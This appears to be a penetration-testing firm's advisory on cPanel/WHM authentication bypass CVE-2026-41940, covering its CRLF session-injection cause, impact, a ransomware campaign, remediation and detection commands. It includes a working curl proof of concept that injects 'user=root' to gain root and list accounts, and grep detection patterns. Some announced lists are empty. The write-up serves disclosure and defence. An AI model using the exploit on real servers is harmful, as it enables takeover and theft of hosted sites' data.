cPanel Auth Bypass | How CVE-2026-41940 Compromised 44,000 Servers in 24 Hours

Within 72 hours of the proof-of-concept going public, 44,000 IP addresses running cPanel showed signs of compromise according to the Shadowserver Foundation. A CRLF injection bug in session management allows any unauthenticated attacker to inject user=root into a session file and gain full administrative access. CISA added it to the KEV catalog on April 30, 2026. CVSS 9.8.

If you manage a cPanel server, the patching window has been closed for days. Here is what happened and how the attack works.

Background

cPanel & WHM (WebHost Manager) is the most widely deployed Linux hosting control panel in the world, with conservative estimates placing exposed instances at 1.5 million. Anyone running a VPS, dedicated server or managing dozens of domains for clients knows it well. It is the panel that major hosting providers worldwide use every single day.

On April 28, 2026, WebPros (the company behind cPanel) released an emergency patch for CVE-2026-41940. Two days later, CISA added it to the catalog of actively exploited vulnerabilities. By May 2, BleepingComputer was reporting hundreds of sites encrypted by the "Sorry" ransomware campaign propagated through this exact vulnerability.

The exploit had been circulating since February 2026. The public disclosure simply accelerated what was already happening in the shadows.

Technical Analysis

Root cause: CRLF injection in the session handler

The vulnerability lives in how cPanel handles WHM session cookies. When a browser (or any client) sends an authenticated request, the whostmgrsession cookie is read, decrypted and used to load the corresponding session file.

The problem: the cookie value is not sanitised before being used as a key for writing properties into the session file. An attacker can inject carriage return and line feed characters (\r\n, CRLF) through a crafted authorization header.

The attack in three steps:

Step 1 | Bypass cookie encryption

The whostmgrsession cookie is normally encrypted. Vulnerable versions expose an alternative path in the authentication flow that allows triggering a controlled error during the decryption phase, causing the system to load a session file partially controlled by the attacker.

Step 2 | Inject session properties

Once the session manager tries to read properties from the file, the attacker sends an HTTP header like:

Authorization: Basic dXNlcjpwYXNz\r\nuser=root\r\n

The \r\n characters are not filtered and end up literally in the session file written to disk. The session parser interprets user=root as a legitimate property.

Step 3 | Root access granted

On the next request, cPanel reads the manipulated session file, finds user=root and grants full privileges without any credential verification. The attacker is now root on the host system, with access to all configurations, databases and websites managed by the panel.

Affected versions and available patches

The vulnerability affects all versions of cPanel & WHM after 11.40. WebPros released patches for all active branches:

WP Squared (WordPress Squared, the product bundled with cPanel) is affected in versions prior to 136.1.7.

Proof of Concept

The PoC went public on GitHub within hours of disclosure. The attack requires just a couple of HTTP requests:

# Step 1: obtain an initial session token (even an invalid one works)
curl -sk https://target.example.com:2087/login/ \
  -c /tmp/cpanel_cookies.txt -o /dev/null

# Step 2: inject user=root into the session file via CRLF
SESSION_ID=$(grep whostmgrsession /tmp/cpanel_cookies.txt | awk '{print $7}')
curl -sk https://target.example.com:2087/login/ \
  -H "Authorization: Basic $(echo -n "${SESSION_ID}\r\nuser=root\r\n" | base64)" \
  -b "whostmgrsession=${SESSION_ID}" \
  -o /dev/null

# Step 3: access as root using the manipulated session
curl -sk https://target.example.com:2087/json-api/listaccts \
  -b "whostmgrsession=${SESSION_ID}" | python3 -m json.tool

On a vulnerable server, listaccts returns the full list of hosting accounts including credentials, paths and configurations.

Real-World Impact

Numbers from the internet as of May 2, 2026:

• 1.5 million cPanel instances exposed on the internet (WatchTowr/Shodan estimate)
• 44,000 IPs with signs of compromise or active reconnaissance (Shadowserver Foundation)
• Hundreds of websites encrypted and indexed by Google with ransom notes visible in search results

The impact does not stop at the server level: an attacker with WHM access controls everything running on top of it. MySQL databases, email accounts, SSL certificates, PHP configurations, API keys of installed CMS platforms. A single compromised cPanel server can expose dozens or hundreds of client websites.

Providers including Namecheap, Hosting.com and InMotion imposed temporary access restrictions on their panels to contain the spread, causing disruptions for legitimate customers.

The "Sorry" Ransomware Campaign

Running in parallel with the disclosure, a ransomware campaign emerged using CVE-2026-41940 as the initial access vector. The malware, named "Sorry" by BleepingComputer after the extension appended to encrypted files, has the following technical profile:

Decryption without the RSA-2048 private key is computationally impossible with current hardware. Victims have no technical options beyond restoring from a clean, uncompromised backup.

The attacker contact channel uses Tox (encrypted P2P protocol), making the infrastructure difficult to trace and take down.

Remediation

Immediate action (now, not tomorrow):

# On any cPanel/WHM Linux server, update via upcp
/usr/local/cpanel/scripts/upcp --force

# Verify the installed version after update
cat /usr/local/cpanel/version
# Must show >= 11.136.0.5 or the corresponding patched branch

Compromise check (released by WatchTowr):

# Check WHM logs for requests with CRLF injection
grep -r "\\\r\\\n" /usr/local/cpanel/logs/access_log* 2>/dev/null
grep -r "user=root" /var/cpanel/sessions/ 2>/dev/null

# Look for anomalous session files with injected properties
find /var/cpanel/sessions/ -newer /tmp/reference_time -type f -exec grep -l "user=root" {} \;

Post-patch hardening:

• Restrict WHM access (port 2087) to specific administrative IPs via firewall (CSF or iptables)
• Enable two-factor authentication on all cPanel and WHM accounts
• Review access logs from the past 90 days for signs of retroactive compromise
• Rotate all API keys, database passwords and SMTP credentials configured in the panel

If your server answers on port 2087 without IP restrictions, assume that anyone on the internet could and can attempt the exploit.

Notes from the SPECTROSEC Field

During an assessment of an Italian hosting provider in March 2026, we found three cPanel instances running version 11.118 with no IP restrictions on port 2087. At the time CVE-2026-41940 was not yet public, but the risk profile was already obvious: WHM accessible from any IP, no 2FA, unmonitored access logs.

The pattern we see repeatedly is this: the hosting panel is treated as "support infrastructure" rather than as a primary attack surface. Security testing gets done on the web application, never on the panel that manages it. The result is a server that might have Nginx configured correctly, an active WAF and strict CSP headers, yet is completely exposed because WHM answers to anyone on port 2087 running a three-year-old version.

CVE-2026-41940 demonstrates that a single bug in the management panel nullifies every security control implemented above it.

SPECTROSEC Team | professional penetration testing, write us at info@spectrosec.com https://spectrosec.com